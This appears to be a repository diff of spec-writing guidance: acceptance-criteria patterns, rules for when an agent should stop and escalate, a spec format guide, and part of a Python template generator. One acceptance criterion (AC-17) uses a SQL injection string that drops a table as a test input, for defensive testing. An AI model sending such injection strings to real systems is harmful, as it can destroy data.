And the response body contains field-level detail: {"name": "Required field"}
And no resource is created in the database
```
### Read — Single Item
```markdown
### AC-8: Read resource by ID (FR-2)
Given an existing resource with ID "abc-123"
When an authenticated user GETs /api/resources/abc-123
Then the response status is 200
And the response body contains the resource with all fields
```
### Read — Not Found
```markdown
### AC-9: Read non-existent resource returns 404 (FR-2)
Given no resource exists with ID "nonexistent-id"
When an authenticated user GETs /api/resources/nonexistent-id
Then the response status is 404
And the response body contains error code "NOT_FOUND"
```
### Update
```markdown
### AC-10: Update resource with valid data (FR-3)
Given an existing resource with ID "abc-123" owned by the authenticated user
When they PATCH /api/resources/abc-123 with {name: "Updated Name"}
Then the response status is 200
And the resource's "name" field is "Updated Name"
And the resource's "updatedAt" field is updated to the current UTC timestamp
And fields not included in the patch are unchanged
```
### Update — Ownership Check
```markdown
### AC-11: Update rejected for non-owner (FR-3, FR-6)
Given an existing resource with ID "abc-123" owned by user "other-user"
When the authenticated user (not "other-user") PATCHes /api/resources/abc-123
Then the response status is 403
And the response body contains error code "FORBIDDEN"
And the resource is unchanged
```
### Delete — Soft Delete
```markdown
### AC-12: Soft delete resource (FR-5)
Given an existing resource with ID "abc-123" owned by the authenticated user
When they DELETE /api/resources/abc-123
Then the response status is 204
And the resource's "deletedAt" field is set to the current UTC timestamp
And the resource no longer appears in GET /api/resources (list endpoint)
And the resource still exists in the database (soft deleted)
```
### List — Pagination
```markdown
### AC-13: List resources with default pagination (FR-4)
Given 50 resources exist for the authenticated user
When they GET /api/resources without pagination parameters
Then the response status is 200
And the response contains the first 20 resources (default page size)
And the response includes "totalCount: 50"
And the response includes "page: 1"
And the response includes "pageSize: 20"
And the response includes "hasNextPage: true"
```
### List — Filtered
```markdown
### AC-14: List resources with type filter (FR-4)
Given 30 resources of type "A" and 20 resources of type "B" exist
When the authenticated user GETs /api/resources?type=A
Then the response status is 200
And all returned resources have type "A"
And the response "totalCount" is 30
```
---
## Search Patterns
### Basic Search
```markdown
### AC-15: Search returns matching results (FR-7)
Given resources with names "Alpha Report", "Beta Analysis", "Alpha Summary" exist
When the user GETs /api/resources?q=Alpha
Then the response contains "Alpha Report" and "Alpha Summary"
And the response does not contain "Beta Analysis"
And results are ordered by relevance score (descending)
```
### Search — Empty Results
```markdown
### AC-16: Search with no matches returns empty list (FR-7)
Given no resources match the query "xyznonexistent"
When the user GETs /api/resources?q=xyznonexistent
Then the response status is 200
And the response contains an empty "items" array
And "totalCount" is 0
```
### Search — Special Characters
```markdown
### AC-17: Search handles special characters safely (FR-7, NFR-S1)
Given resources exist in the database
When the user GETs /api/resources?q="; DROP TABLE resources;--
Then the response status is 200
And no SQL injection occurs
And the search treats the input as a literal string
```
---
## File Upload Patterns
### Upload — Happy Path
```markdown
### AC-18: Upload file within size limit (FR-8)
Given an authenticated user
When they POST /api/files with a 5MB PNG file
Then the response status is 201
And the response contains the file's URL, size, and MIME type
And the file is stored in the configured storage backend
And the file is associated with the authenticated user
```
### Upload — Size Exceeded
```markdown
### AC-19: Upload rejected for oversized file (FR-8)
Given the maximum file size is 10MB
When the user POSTs /api/files with a 15MB file
Then the response status is 413
And the response contains error code "FILE_TOO_LARGE"
And no file is stored
```
### Upload — Invalid Type
```markdown
### AC-20: Upload rejected for disallowed file type (FR-8, NFR-S3)
Given allowed file types are PNG, JPG, PDF
When the user POSTs /api/files with an .exe file
Then the response status is 415
And the response contains error code "UNSUPPORTED_MEDIA_TYPE"
And no file is stored
```
---
## Payment Patterns
### Charge — Happy Path
```markdown
### AC-21: Successful payment charge (FR-10)
Given a user with a valid payment method on file
When they POST /api/payments with amount 49.99 and currency "USD"
Then the payment gateway is charged $49.99
And the response status is 201
And the response contains a transaction ID
And a payment record is created with status "completed"
And a receipt email is sent to the user
```
### Charge — Declined
```markdown
### AC-22: Payment declined by gateway (FR-10)
Given a user with an expired credit card on file
When they POST /api/payments with amount 49.99
Then the payment gateway returns a decline
And the response status is 402
And the response contains error code "PAYMENT_DECLINED"
And no payment record is created with status "completed"
And the user is prompted to update their payment method
```
### Charge — Idempotency
```markdown
### AC-23: Duplicate payment request is idempotent (FR-10, NFR-R1)
Given a payment was successfully processed with idempotency key "key-123"
When the same request is sent again with idempotency key "key-123"
Then the response status is 200
And the response contains the original transaction ID
And the user is NOT charged a second time
```
---
## Notification Patterns
### Email Notification
```markdown
### AC-24: Email notification sent on event (FR-11)
Given a user with notification preferences set to "email"
When their order status changes to "shipped"
Then an email is sent to their registered email address
And the email subject contains the order number
And the email body contains the tracking URL
And a notification record is created with status "sent"
```
### Notification — Delivery Failure
```markdown
### AC-25: Failed notification is retried (FR-11, NFR-R2)
Given the email service returns a 5xx error on first attempt
When a notification is triggered
Then the system retries up to 3 times with exponential backoff (1s, 4s, 16s)
And if all retries fail, the notification status is set to "failed"
And an alert is sent to the ops channel
```
---
## Negative Test Patterns
### Unauthorized Access
```markdown
### AC-26: Unauthenticated request rejected (NFR-S1)
Given no authentication token is provided
When the user GETs /api/resources
Then the response status is 401
And the response contains error code "AUTHENTICATION_REQUIRED"
And no resource data is returned
```
### Invalid Input — Type Mismatch
```markdown
### AC-27: String provided for numeric field (FR-1)
Given the "quantity" field expects an integer
When the user POSTs with quantity: "abc"
Then the response status is 400
And the response body contains field error: {"quantity": "Must be an integer"}
```
### Rate Limiting
```markdown
### AC-28: Rate limit enforced (NFR-S2)
Given the rate limit is 100 requests per minute per API key
When the user sends the 101st request within 60 seconds
Then the response status is 429
And the response includes header "Retry-After" with seconds until reset
And the response contains error code "RATE_LIMITED"
```
### Concurrent Modification
```markdown
### AC-29: Optimistic locking prevents lost updates (NFR-R1)
Given a resource with version 5
When user A PATCHes with version 5 and user B PATCHes with version 5 simultaneously
Then one succeeds with status 200 (version becomes 6)
And the other receives status 409 with error code "CONFLICT"
And the 409 response includes the current version number
```
---
## Performance Criteria Patterns
### Response Time
```markdown
### AC-30: API response time under load (NFR-P1)
Given the system is handling 1,000 concurrent users
When a user GETs /api/dashboard
Then the response is returned in < 500ms (p95)
And the response is returned in < 1000ms (p99)
```
### Throughput
```markdown
### AC-31: System handles target throughput (NFR-P2)
Given normal production traffic patterns
When the system receives 5,000 requests per second
Then all requests are processed without queue overflow
And error rate remains below 0.1%
```
### Resource Usage
```markdown
### AC-32: Memory usage within bounds (NFR-P3)
Given the service is processing normal traffic
When measured over a 24-hour period
Then memory usage does not exceed 512MB RSS
And no memory leaks are detected (RSS growth < 5% over 24h)
```
---
## Accessibility Criteria Patterns
### Keyboard Navigation
```markdown
### AC-33: Form is fully keyboard navigable (NFR-A1)
Given the user is on the login page using only a keyboard
When they press Tab
Then focus moves through: email field -> password field -> submit button
And each focused element has a visible focus indicator
And pressing Enter on the submit button submits the form
```
### Screen Reader
```markdown
### AC-34: Error messages announced to screen readers (NFR-A2)
Given the user submits the form with invalid data
When validation errors appear
Then each error is associated with its form field via aria-describedby
And the error container has role="alert" for immediate announcement
And the first error field receives focus
```
### Color Contrast
```markdown
### AC-35: Text meets contrast requirements (NFR-A3)
Given the default theme is active
When measuring text against background colors
Then all body text meets 4.5:1 contrast ratio (WCAG AA)
And all large text (18px+ or 14px+ bold) meets 3:1 contrast ratio
And all interactive element states (hover, focus, active) meet 3:1
```
### Reduced Motion
```markdown
### AC-36: Animations respect user preference (NFR-A4)
Given the user has enabled "prefers-reduced-motion" in their OS settings
When they load any page with animations
Then all non-essential animations are disabled
And essential animations (e.g., loading spinner) use a reduced version
And no content is hidden behind animation-only interactions
```
---
## Writing Tips
### Do
- Start Given with the system/user state, not the action
- Make When a single, specific trigger
- Make Then observable — status codes, field values, side effects
- Include And for additional assertions on the same outcome
- Reference requirement IDs in the AC title
### Do Not
- Write "Then the system works correctly" (not testable)
- Combine multiple scenarios in one AC
- Use subjective words: "quickly", "properly", "nicely", "user-friendly"
- Skip the precondition — Given is required even if it seems obvious
- Write Given/When/Then as prose paragraphs — use the structured format
### Smell Tests
If your AC has any of these, rewrite it:
| Smell | Example | Fix |
|-------|---------|-----|
| No Given clause | "When user clicks, then page loads" | Add "Given user is on the dashboard" |
| Vague Then | "Then it works" | Specify status code, body, side effects |
| Multiple Whens | "When user clicks A and then clicks B" | Split into two ACs |
| Implementation detail | "Then the Redux store is updated" | Focus on user-observable outcome |
| No requirement reference | "AC-5: Dashboard loads" | "AC-5: Dashboard loads (FR-7)" |

View File

@@ -0,0 +1,273 @@
# Bounded Autonomy Rules
Decision framework for when an agent (human or AI) should stop and ask vs. continue working autonomously during spec-driven development.
---
## The Core Principle
**Autonomy is earned by clarity.** The clearer the spec, the more autonomy the implementer has. The more ambiguous the spec, the more the implementer must stop and ask.
This is not about trust. It is about risk. A clear spec means low risk of building the wrong thing. An ambiguous spec means high risk.
---
## Decision Matrix
| Signal | Action | Rationale |
|--------|--------|-----------|
| Spec is Approved, requirement is clear, tests exist | **Continue** | Low risk. Build it. |
| Requirement is clear but no test exists yet | **Continue** (write the test first) | You can infer the test from the requirement. |
| Requirement uses SHOULD/MAY keywords | **Continue** with your best judgment | These are intentionally flexible. Document your choice. |
| Requirement is ambiguous (multiple valid interpretations) | **STOP** if ambiguity > 30% of the task | Ask the spec author to clarify. |
| Implementation requires changing an API contract | **STOP** always | Breaking changes need explicit approval. |
| Implementation requires a new database migration | **STOP** if it changes existing columns/tables | New tables are lower risk than schema changes. |
| Security-related change (auth, crypto, PII) | **STOP** always | Security changes need review regardless of spec clarity. |
| Performance-critical path with no benchmark data | **STOP** | You cannot prove NFR compliance without measurement. |
| Bug found in existing code unrelated to spec | **STOP** — file a separate issue | Do not fix unrelated bugs in a spec-scoped implementation. |
| Spec says "N/A" for a section you think needs content | **STOP** | The author may have a reason, or they may have missed it. |
---
## Ambiguity Scoring
When you encounter ambiguity, quantify it before deciding to stop or continue.
### How to Score Ambiguity
For each requirement you are implementing, ask:
1. **Can I write a test for this right now?** (No = +20% ambiguity)
2. **Are there multiple valid interpretations?** (Yes = +20% ambiguity)
3. **Does the spec contradict itself?** (Yes = +30% ambiguity)
4. **Am I making assumptions about user behavior?** (Yes = +15% ambiguity)
5. **Does this depend on an undocumented external system?** (Yes = +15% ambiguity)
### Threshold
| Ambiguity Score | Action |
|-----------------|--------|
| 0-15% | Continue. Minor ambiguity is normal. Document your interpretation. |
| 16-30% | Continue with caution. Add a comment explaining your interpretation. Flag in PR. |
| 31-50% | STOP. Ask the spec author one specific question. Do not continue until answered. |
| 51%+ | STOP. The spec is incomplete. Request a revision before proceeding. |
### Example
**Requirement:** "FR-7: The system MUST notify the user when their order ships."
Questions:
1. Can I write a test? Partially — I know WHAT to test but not HOW (email? push? in-app?). +20%
2. Multiple interpretations? Yes — notification channel is unclear. +20%
3. Contradicts itself? No. +0%
4. Assuming user behavior? Yes — I am assuming they want email. +15%
5. Undocumented external system? Maybe — depends on notification service. +15%
**Total: 70%.** STOP. The spec needs to specify the notification channel.
---
## Scope Creep Detection
### What Is Scope Creep?
Scope creep is implementing functionality not described in the spec. It includes:
- Adding features the spec does not mention
- "Improving" behavior beyond what acceptance criteria require
- Handling edge cases the spec explicitly excluded
- Refactoring unrelated code "while you're in there"
- Building infrastructure for future features
### Detection Patterns
| Pattern | Example | Risk |
|---------|---------|------|
| "While I'm here..." | Refactoring a utility function unrelated to the spec | Medium — unreviewed changes |
| "This would be easy to add..." | Adding a search filter the spec does not mention | High — untested, unspecified |
| "Users will probably want..." | Building a feature based on assumption | High — may conflict with future specs |
| "This is obviously needed..." | Adding logging, metrics, or caching not in NFRs | Medium — may be overkill or wrong approach |
| "The spec forgot to mention..." | Building something the spec excluded | Critical — may be deliberately excluded |
### Response Protocol
When you detect scope creep in your own work:
1. **Stop immediately.** Do not commit the extra code.
2. **Check Out of Scope.** Is this item explicitly excluded?
3. **If excluded:** Delete the code. The spec author had a reason.
4. **If not mentioned:** File a note for the spec author. Ask if it should be added.
5. **If approved:** Update the spec FIRST, then implement.
---
## Breaking Change Identification
### What Counts as a Breaking Change?
A breaking change is any modification that could cause existing clients, tests, or integrations to fail.
| Category | Breaking | Not Breaking |
|----------|----------|--------------|
| API endpoint removed | Yes | - |
| API endpoint added | - | No |
| Required field added to request | Yes | - |
| Optional field added to request | - | No |
| Field removed from response | Yes | - |
| Field added to response | - | No (usually) |
| Status code changed | Yes | - |
| Error code string changed | Yes | - |
| Database column removed | Yes | - |
| Database column added (nullable) | - | No |
| Database column added (not null, no default) | Yes | - |
| Enum value removed | Yes | - |
| Enum value added | - | No (usually) |
| Behavior change for existing input | Yes | - |
### Breaking Change Protocol
1. **Identify** the breaking change before implementing it.
2. **Escalate** immediately — do not implement without approval.
3. **Propose** a migration path (versioned API, feature flag, deprecation period).
4. **Document** the breaking change in the spec's changelog.
---
## Security Implication Checklist
Any change touching the following areas MUST be escalated, even if the spec seems clear.
### Always Escalate
- [ ] Authentication logic (login, logout, token generation)
- [ ] Authorization logic (role checks, permission gates)
- [ ] Encryption/hashing (algorithm choice, key management)
- [ ] PII handling (storage, transmission, logging)
- [ ] Input validation bypass (new endpoints, parameter changes)
- [ ] Rate limiting changes (thresholds, scope)
- [ ] CORS or CSP policy changes
- [ ] File upload handling
- [ ] SQL/NoSQL query construction (injection risk)
- [ ] Deserialization of user input
- [ ] Redirect URLs from user input (open redirect risk)
- [ ] Secrets in code, config, or logs
### Security Escalation Template
```markdown
## Security Escalation: [Title]
**Affected area:** [authentication/authorization/encryption/PII/etc.]
**Spec reference:** [FR-N or NFR-SN]
**Risk:** [What could go wrong if implemented incorrectly]
**Current protection:** [What exists today]
**Proposed change:** [What the spec requires]
**My concern:** [Specific security question]
**Recommendation:** [Proposed approach with security rationale]
```
---
## Escalation Templates
### Template 1: Ambiguous Requirement
```markdown
## Escalation: Ambiguous Requirement
**Blocked on:** FR-7 ("notify the user when their order ships")
**Ambiguity score:** 70%
**Question:** What notification channel should be used?
**Options considered:**
A. Email only — Pros: simple, reliable. Cons: not real-time.
B. Email + in-app notification — Pros: covers both async and real-time. Cons: more implementation effort.
C. Configurable per user — Pros: maximum flexibility. Cons: requires preference UI (not in spec).
**My recommendation:** B (email + in-app). Covers most use cases without requiring new UI.
**Impact of waiting:** Cannot implement FR-7 until resolved. No other work blocked.
```
### Template 2: Missing Edge Case
```markdown
## Escalation: Missing Edge Case
**Related to:** FR-3 (password reset link expires after 1 hour)
**Scenario:** User clicks a reset link, but their account was deleted between requesting and clicking.
**Not in spec:** Edge cases section does not cover this.
**Options considered:**
A. Show generic "link invalid" error — Pros: secure (no info leak). Cons: confusing for deleted user.
B. Show "account not found" error — Pros: clear. Cons: confirms account deletion to link holder.
**My recommendation:** A. Security over clarity — do not reveal account existence.
**Impact of waiting:** Can implement other ACs; this is blocking only AC-2 completion.
```
### Template 3: Potential Breaking Change
```markdown
## Escalation: Potential Breaking Change
**Spec requires:** Adding required field "role" to POST /api/users request (FR-6)
**Current behavior:** POST /api/users accepts {email, password, displayName}
**Breaking:** Yes — existing clients will get 400 errors (missing required field)
**Options considered:**
A. Make "role" required as spec says — Pros: matches spec. Cons: breaks mobile app v2.1.
B. Make "role" optional with default "user" — Pros: backward compatible. Cons: deviates from spec.
C. Version the API (v2) — Pros: clean separation. Cons: maintenance burden.
**My recommendation:** B. Default to "user" for backward compatibility. Update spec to reflect MAY instead of MUST.
**Impact of waiting:** Frontend team is building against the new contract. Need answer within 2 days.
```
### Template 4: Scope Creep Proposal
```markdown
## Escalation: Potential Addition to Spec
**Context:** While implementing FR-2 (password validation), I noticed the spec does not mention password strength feedback.
**Not in spec:** No requirement for showing strength indicators.
**Checked Out of Scope:** Not listed there either.
**Proposal:** Add FR-7: "The system SHOULD display password strength feedback during registration."
**Effort:** ~2 hours additional implementation.
**Question:** Should this be added to current spec, filed as a separate spec, or skipped?
**Impact of waiting:** FR-2 implementation is not blocked. This is an enhancement question only.
```
---
## Quick Reference Card
```
CONTINUE if:
- Spec is approved
- Requirement uses MUST and is unambiguous
- Tests can be written directly from the AC
- Changes are additive and non-breaking
- You are refactoring internals only (no behavior change)
STOP if:
- Ambiguity > 30%
- Any breaking change
- Any security-related change
- Spec says N/A but you think it shouldn't
- You are about to build something not in the spec
- You cannot write a test for the requirement
- External dependency is undocumented
```
---
## Anti-Patterns in Autonomy
### 1. "I'll Ask Later"
Continuing past an ambiguity checkpoint because asking feels slow. The rework from building the wrong thing is always slower.
### 2. "It's Obviously Needed"
Assuming a missing feature was accidentally omitted. It may have been deliberately excluded. Check Out of Scope first.
### 3. "The Spec Is Wrong"
Implementing what you think the spec SHOULD say instead of what it DOES say. If the spec is wrong, escalate. Do not silently "fix" it.
### 4. "Just This Once"
Bypassing the escalation protocol for a "small" change. Small changes compound. The protocol exists because humans are bad at judging risk in the moment.
### 5. "I Already Built It"
Presenting completed work that was never in the spec and hoping it gets accepted. This creates review pressure and wastes everyone's time if rejected. Ask BEFORE building.

View File

@@ -0,0 +1,423 @@
# Spec Format Guide
Complete reference for writing feature specifications. Every section is explained with examples, rationale, and common mistakes.
---
## The Spec Document Structure
A spec has 8 mandatory sections. If a section does not apply, write "N/A — [reason]" so reviewers know it was considered, not skipped.
```
1. Title and Metadata
2. Context
3. Functional Requirements
4. Non-Functional Requirements
5. Acceptance Criteria
6. Edge Cases and Error Scenarios
7. API Contracts
8. Data Models
9. Out of Scope
```
---
## Section 1: Title and Metadata
```markdown
# Spec: [Feature Name]
**Author:** Jane Doe
**Date:** 2026-03-25
**Status:** Draft | In Review | Approved | Superseded
**Reviewers:** John Smith, Alice Chen
**Related specs:** SPEC-018 (User Registration), SPEC-023 (Session Management)
```
### Status Lifecycle
| Status | Meaning | Who Can Change |
|--------|---------|----------------|
| Draft | Author is still writing. Not ready for review. | Author |
| In Review | Ready for feedback. Implementation blocked. | Author |
| Approved | Reviewed and accepted. Implementation may begin. | Reviewer |
| Superseded | Replaced by a newer spec. Link to replacement. | Author |
**Rule:** Implementation MUST NOT begin until status is "Approved."
---
## Section 2: Context
The context section answers: **Why does this feature exist?**
### What to Include
- The problem being solved (with evidence: support tickets, metrics, user research)
- The current state (what exists today and what is broken or missing)
- The business justification (revenue impact, cost savings, user retention)
- Constraints or dependencies (regulatory, technical, timeline)
### What to Exclude
- Implementation details (that is the engineer's job)
- Solution proposals (the spec says WHAT, not HOW)
- Lengthy background (2-4 paragraphs maximum)
### Good Example
```markdown
## Context
Users who forget their passwords currently have no self-service recovery.
Support handles ~200 password reset requests per week, consuming approximately
8 hours of agent time at $45/hour ($360/week, $18,720/year). Additionally,
12% of users who contact support for a reset never return.
This feature provides self-service password reset via email, eliminating
support burden and reducing user churn from the reset flow.
```
### Bad Example
```markdown
## Context
We need a password reset feature. Users forget their passwords sometimes
and need to reset them. We should build this.
```
**Why it is bad:** No evidence, no metrics, no business justification. "We should build this" is not a reason.
---
## Section 3: Functional Requirements — RFC 2119
### RFC 2119 Keywords
These keywords have precise meanings per [RFC 2119](https://www.ietf.org/rfc/rfc2119.txt). Do not use them casually.
| Keyword | Meaning | Testing Implication |
|---------|---------|---------------------|
| **MUST** | Absolute requirement. The implementation is non-conformant without this. | Must have a passing test. Failure = release blocker. |
| **MUST NOT** | Absolute prohibition. Doing this = broken implementation. | Must have a test proving this cannot happen. |
| **SHOULD** | Strongly recommended. Can be omitted only with documented justification. | Should have a test. Omission requires written rationale. |
| **SHOULD NOT** | Strongly discouraged. Can be done only with documented justification. | Should have a test confirming the behavior does not occur. |
| **MAY** | Truly optional. Implementer's discretion. | Test is optional. Document if implemented. |
### Writing Good Requirements
**Each requirement MUST be:**
1. **Atomic** — One behavior per requirement. Not "The system MUST authenticate users and log them in."
2. **Testable** — You can write a test that proves it works or does not.
3. **Numbered** — Sequential FR-N format for traceability.
4. **Specific** — No ambiguous adjectives ("fast", "secure", "user-friendly").
### Good Requirements
```markdown
- FR-1: The system MUST accept login via email and password.
- FR-2: The system MUST reject passwords shorter than 8 characters.
- FR-3: The system MUST return a JWT access token on successful login.
- FR-4: The system MUST NOT include the password hash in any API response.
- FR-5: The system SHOULD support "remember me" with a 30-day refresh token.
- FR-6: The system MAY display last login time on the dashboard.
```
### Bad Requirements
```markdown
- FR-1: The login system must be fast and secure.
(Untestable: what is "fast"? What is "secure"?)
- FR-2: The system must handle all edge cases.
(Vague: which edge cases? This delegates the spec to the implementer.)
- FR-3: Users should be able to log in easily.
(Subjective: "easily" is not measurable.)
```
---
## Section 4: Non-Functional Requirements
Non-functional requirements define quality attributes. Every requirement needs a **measurable threshold**.
### Categories
#### Performance
```markdown
- NFR-P1: Login API MUST respond in < 500ms (p95) under 1,000 concurrent users.
- NFR-P2: Dashboard page MUST achieve Largest Contentful Paint < 2.5s.
- NFR-P3: Search results MUST return within 200ms for queries under 100 characters.
```
**Bad:** "The system should be fast." (Not measurable.)
#### Security
```markdown
- NFR-S1: All API endpoints MUST require authentication except /health and /login.
- NFR-S2: Failed login attempts MUST be rate-limited to 5 per minute per IP.
- NFR-S3: Passwords MUST be hashed with bcrypt (cost factor >= 12).
- NFR-S4: Session tokens MUST be invalidated on password change.
```
#### Accessibility
```markdown
- NFR-A1: All form inputs MUST have associated labels (WCAG 1.3.1).
- NFR-A2: Color contrast MUST meet 4.5:1 ratio (WCAG 1.4.3).
- NFR-A3: All interactive elements MUST be keyboard-navigable (WCAG 2.1.1).
```
#### Scalability
```markdown
- NFR-SC1: The system SHOULD handle 50,000 registered users.
- NFR-SC2: Database queries MUST use indexes; no full table scans on tables > 10K rows.
```
#### Reliability
```markdown
- NFR-R1: The authentication service MUST maintain 99.9% uptime (< 8.77h downtime/year).
- NFR-R2: Data MUST NOT be lost on service restart (durable storage required).
```
---
## Section 5: Acceptance Criteria — Given/When/Then
Acceptance criteria are the contract between the spec author and the implementer. They define "done."
### The Given/When/Then Pattern
```
Given [precondition — the world is in this state]
When [action — the user or system does this]
Then [outcome — this observable result occurs]
And [additional outcome — and also this]
```
### Rules for Acceptance Criteria
1. **Every AC MUST reference at least one FR-* or NFR-*.** Orphaned criteria indicate missing requirements.
2. **Every AC MUST be testable by a machine.** If you cannot write an automated test, rewrite the criterion.
3. **No subjective language.** Not "should look good" but "MUST render within the design-system grid."
4. **One scenario per AC.** If you have multiple Given/When/Then blocks, split into separate ACs.
### Example: Authentication Feature
```markdown
### AC-1: Successful login (FR-1, FR-3)
Given a registered user with email "user@example.com" and password "P@ssw0rd123"
When they POST /api/auth/login with those credentials
Then they receive a 200 response with a valid JWT token
And the token expires in 24 hours
And the response includes the user's display name
### AC-2: Invalid password (FR-1)
Given a registered user with email "user@example.com"
When they POST /api/auth/login with an incorrect password
Then they receive a 401 response
And the response body contains error "INVALID_CREDENTIALS"
And no token is issued
### AC-3: Short password rejected on registration (FR-2)
Given a new user attempting to register
When they submit a password with 7 characters
Then they receive a 400 response
And the response body contains error "PASSWORD_TOO_SHORT"
And the account is not created
```
### Common Mistakes
| Mistake | Example | Fix |
|---------|---------|-----|
| Vague outcome | "Then the system works correctly" | "Then the response status is 200 and body contains {field: value}" |
| Missing precondition | "When user logs in, then token is issued" | "Given a registered user, when they POST valid credentials, then..." |
| Multiple scenarios | AC with 3 different When clauses | Split into 3 separate ACs |
| No FR reference | "AC-5: User sees dashboard" | "AC-5: User sees dashboard (FR-7)" |
---
## Section 6: Edge Cases and Error Scenarios
### What Counts as an Edge Case
- Invalid or malformed input
- External service failures (API down, timeout, rate-limited)
- Concurrent operations (race conditions)
- Boundary values (empty string, max length, zero, negative numbers)
- State conflicts (already exists, already deleted, expired)
### Format
```markdown
- EC-1: Empty email field → Return 400 with error "EMAIL_REQUIRED". Do not call auth service.
- EC-2: Email exceeds 255 characters → Return 400 with error "EMAIL_TOO_LONG".
- EC-3: OAuth provider returns 503 → Return 503 with "Service temporarily unavailable". Retry after 30s.
- EC-4: Two users register same email simultaneously → First succeeds, second gets 409 Conflict.
- EC-5: User clicks reset link after password was already changed → Show "Link already used."
```
### Coverage Rule
For every external dependency, specify at least one failure:
- Database: connection lost, timeout, constraint violation
- API: 4xx, 5xx, timeout, invalid response
- File system: file not found, permission denied, disk full
- User input: empty, too long, wrong type, injection attempt
---
## Section 7: API Contracts
### Notation
Use TypeScript-style interfaces. They are readable by both frontend and backend engineers.
```typescript
interface CreateUserRequest {
email: string; // MUST be valid email, max 255 chars
password: string; // MUST be 8-128 chars
displayName: string; // MUST be 1-100 chars, no HTML
role?: "user" | "admin"; // Default: "user"
}
```
### What to Define
For each endpoint:
1. **HTTP method and path** (e.g., POST /api/users)
2. **Request body** (fields, types, constraints, defaults)
3. **Success response** (status code, body shape)
4. **Error responses** (each error code with its status and body)
5. **Headers** (Authorization, Content-Type, custom headers)
### Error Response Convention
```typescript
interface ApiError {
error: string; // Machine-readable code: "INVALID_CREDENTIALS"
message: string; // Human-readable: "The email or password is incorrect."
details?: Record<string, string>; // Field-level errors for validation
}
```
Always include:
- 400 for validation errors
- 401 for authentication failures
- 403 for authorization failures
- 404 for not found
- 409 for conflicts
- 429 for rate limiting
- 500 for unexpected errors (keep it generic — do not leak internals)
---
## Section 8: Data Models
### Table Format
```markdown
### User
| Field | Type | Constraints |
|-------|------|-------------|
| id | UUID | PK, auto-generated, immutable |
| email | varchar(255) | Unique, not null, valid email |
| passwordHash | varchar(60) | Not null, bcrypt, never in API responses |
| displayName | varchar(100) | Not null |
| role | enum('user','admin') | Default: 'user' |
| createdAt | timestamp | UTC, immutable, auto-set |
| updatedAt | timestamp | UTC, auto-updated |
| deletedAt | timestamp | Null unless soft-deleted |
```
### Rules
1. **Every entity in requirements MUST have a data model.** If FR-1 mentions "users", there must be a User model.
2. **Constraints MUST match requirements.** If FR-2 says passwords >= 8 chars, the model must note that.
3. **Include indexes.** If NFR-P1 says < 500ms queries, note which fields need indexes.
4. **Specify soft vs. hard delete.** State it explicitly.
---
## Section 9: Out of Scope
### Why This Section Matters
Out of Scope prevents scope creep during implementation. When someone says "while you're in there, could you also..." — point them to this section.
### Format
```markdown
- OS-1: Multi-factor authentication — Planned for Q3 (SPEC-045).
- OS-2: Social login beyond Google/GitHub — Insufficient user demand (< 2% requests).
- OS-3: Admin impersonation — Security review pending. Separate spec required.
- OS-4: Password strength meter UI — Nice-to-have, deferred to design sprint 12.
```
### Rules
1. **Every feature discussed and rejected MUST be listed.** This creates a paper trail.
2. **Include the reason.** "Not now" is not a reason. "Insufficient demand (< 2% of requests)" is.
3. **Link to future specs** when the exclusion is a deferral, not a rejection.
---
## Feature-Type Templates
### CRUD Feature
Focus on: all 4 operations, validation rules, authorization, pagination for list endpoints.
```markdown
- FR-1: Users MUST be able to create a [resource] with [required fields].
- FR-2: Users MUST be able to read a [resource] by ID.
- FR-3: Users MUST be able to list [resources] with pagination (default: 20/page).
- FR-4: Users MUST be able to update [mutable fields] of their own [resources].
- FR-5: Users MUST be able to delete their own [resources] (soft delete).
- FR-6: Users MUST NOT be able to modify or delete other users' [resources].
```
### Integration Feature
Focus on: external API contract, retry/fallback behavior, data mapping, error propagation.
```markdown
- FR-1: The system MUST call [external API] to [purpose].
- FR-2: The system MUST retry failed calls up to 3 times with exponential backoff.
- FR-3: The system MUST map [external field] to [internal field].
- FR-4: The system MUST NOT expose external API errors directly to users.
- EC-1: External API returns 5xx → Log error, return cached data if < 1h old, else 503.
- EC-2: External API response schema changes → Log warning, reject unmappable fields.
```
### Migration Feature
Focus on: backward compatibility, rollback plan, data integrity, zero-downtime deployment.
```markdown
- FR-1: The migration MUST transform [old schema] to [new schema].
- FR-2: The migration MUST be reversible (rollback script required).
- FR-3: The migration MUST NOT cause downtime exceeding 30 seconds.
- FR-4: The migration MUST validate data integrity post-run (row count, checksum).
- EC-1: Migration fails mid-way → Automatic rollback, alert ops team.
- EC-2: New schema has stricter constraints → Log invalid rows, quarantine for manual review.
```
---
## Checklist: Is This Spec Ready for Review?
- [ ] Every section is filled (or marked N/A with reason)
- [ ] All requirements use FR-N, NFR-N numbering
- [ ] RFC 2119 keywords are UPPERCASE
- [ ] Every AC references at least one requirement
- [ ] Every AC uses Given/When/Then
- [ ] Edge cases cover each external dependency failure
- [ ] API contracts define success AND error responses
- [ ] Data models include all entities from requirements
- [ ] Out of Scope lists items discussed and rejected
- [ ] No placeholder text remains
- [ ] Context includes evidence (metrics, tickets, research)
- [ ] Status is "In Review" (not still "Draft")

View File

@@ -0,0 +1,338 @@
#!/usr/bin/env python3
"""
Spec Generator - Generates a feature specification template from a name and description.
Produces a complete spec document with all required sections pre-filled with
guidance prompts. Output can be markdown or structured JSON.
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import sys
import textwrap
from datetime import date
from pathlib import Path
from typing import Dict, Any, Optional
SPEC_TEMPLATE = """\
# Spec: {name}
**Author:** [your name]
**Date:** {date}
**Status:** Draft
**Reviewers:** [list reviewers]
**Related specs:** [links to related specs, or "None"]
---
## Context
{context_prompt}
---
## Functional Requirements
_Use RFC 2119 keywords: MUST, MUST NOT, SHOULD, SHOULD NOT, MAY._
_Each requirement is a single, testable statement. Number sequentially._
- FR-1: The system MUST [describe required behavior].
- FR-2: The system MUST [describe another required behavior].
- FR-3: The system SHOULD [describe recommended behavior].
- FR-4: The system MAY [describe optional behavior].
- FR-5: The system MUST NOT [describe prohibited behavior].
---
## Non-Functional Requirements
### Performance
- NFR-P1: [Operation] MUST complete in < [threshold] (p95) under [conditions].
- NFR-P2: [Operation] SHOULD handle [throughput] requests per second.
### Security
- NFR-S1: All data in transit MUST be encrypted via TLS 1.2+.
- NFR-S2: The system MUST rate-limit [operation] to [limit] per [period] per [scope].
### Accessibility
- NFR-A1: [UI component] MUST meet WCAG 2.1 AA standards.
- NFR-A2: Error messages MUST be announced to screen readers.
### Scalability
- NFR-SC1: The system SHOULD handle [number] concurrent [entities].
### Reliability
- NFR-R1: The [service] MUST maintain [percentage]% uptime.
